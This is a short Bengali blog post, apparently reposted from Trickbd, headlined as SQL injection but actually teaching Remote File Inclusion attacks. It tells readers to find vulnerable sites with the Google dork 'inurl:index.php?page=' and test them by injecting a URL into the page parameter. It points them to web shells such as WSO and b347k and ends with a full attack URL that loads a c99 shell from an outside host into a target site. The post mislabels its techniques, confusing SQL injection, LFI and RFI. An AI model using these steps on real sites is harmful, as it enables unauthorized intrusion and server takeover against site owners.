Sql injection bangla part 2 (last part )

Posted on

Remote File Inclusion হলো বর্তমান সময়ের জনপ্রিয় হ্যাকিং পদ্ধতি গুলোর মধ্যে একটি।
যা ওয়েব এপ্লিকেশনে পাওয়া যায়।
এই ধরনের দুর্বলতাকে ব্যাবহার করে হ্যাকার দুর্বল সাইটটির সার্ভারে ফাইল এড/যোগ করতে পারে।
যদি হ্যাকার সফল ভাবে এই কাজটি করতে সক্ষম হয় তাহলে সে সেই দুর্বল সাইটটি কে হ্যাক করতে পারবে।
এবং তার সাথে সাথে সার্ভারটি ও হ্যাক করা সম্ভব।
সাধারনত এই টাইপের দুর্বলতা গুলো এই ধরনের সাইটে থাকে যেই সাইট গুলোর লিঙ্ক গুলো এরকম হয়।
উদাহারণঃ http://www.Targetsite.com/index.php?page=index.php
এই দুর্বলতাটি তে দুর্বল সাইট বের করার জন্যে সবচেয়ে বেশী কার্যকর google dork হচ্ছে
“inurl:index.php?page=”
এই Dork টি index.php?page ইউআরএলের যত সাইট আছে সব গুলো আপনাকে রেসাল্টে দেখাবে।
যেকোনো একটি সাইটে প্রবেশ করুন এবং সাইটটি দুর্বল নাকি চেক করার জন্যে
?page= এর পর www.google.com এড করে এন্টার চাপুন।
উদাহারণঃ www.targetsite.com/index.php?page=www.google.com

যদি মনে করেন ওয়েবসাইট টি হয় http://example.com/v2/index.php?page=index.php
তাহলে কোড দেওয়ার পর লিঙ্কটি হবে এরকমঃ
http://www.example.com/v2/index.php?page=http://google.com/
যদি সাইটটি এখন গুগলে রিডাইরেক্ট করে।
মানে যদি আপনি এই লিঙ্কে যাওয়ার পর দেখতে পান যে গুগল দেখা যাচ্ছে তাহলে সাইট টি দুর্বল।
যদি না আসে।। তাহলে আরেকটি সাইট খুজে বের করেন!
এরপরে।। এখন কাজ হলো হ্যাকিং শেল আপলোড দেওয়া।
শেল ডাউনলোড করার জন্যে গুগল করতে পারেন।
(madspot shell download)(wso shell download)
(b347k shell download)
Etc…
যায় হোক LFI এর জন্যে আমাদের শেল ডাউনলোড করা লাগবে না।
শেল আপলোড করা আছে এমন কোনো হোস্টিং থাকলেয় চলবে
সেটার জন্যে গুগলে সার্চ করুন।
c99 shell.txt
http://www.c99txt.net/s/c99.txt (শেল লিঙ্ক)
এখন শেল আপলোড করার জন্যে লিঙ্কটি হবে।
http://www.vuln.rfisite.com/v2/index.php?page=http://www.c99txt.net/s/c99.txt

ধন্যবাদ আশা করি সবাই বুঝতে পেরেছেন।

The post Sql injection bangla part 2 (last part ) appeared first on Trickbd.com.

Source:

Leave a Reply

Your email address will not be published. Required fields are marked *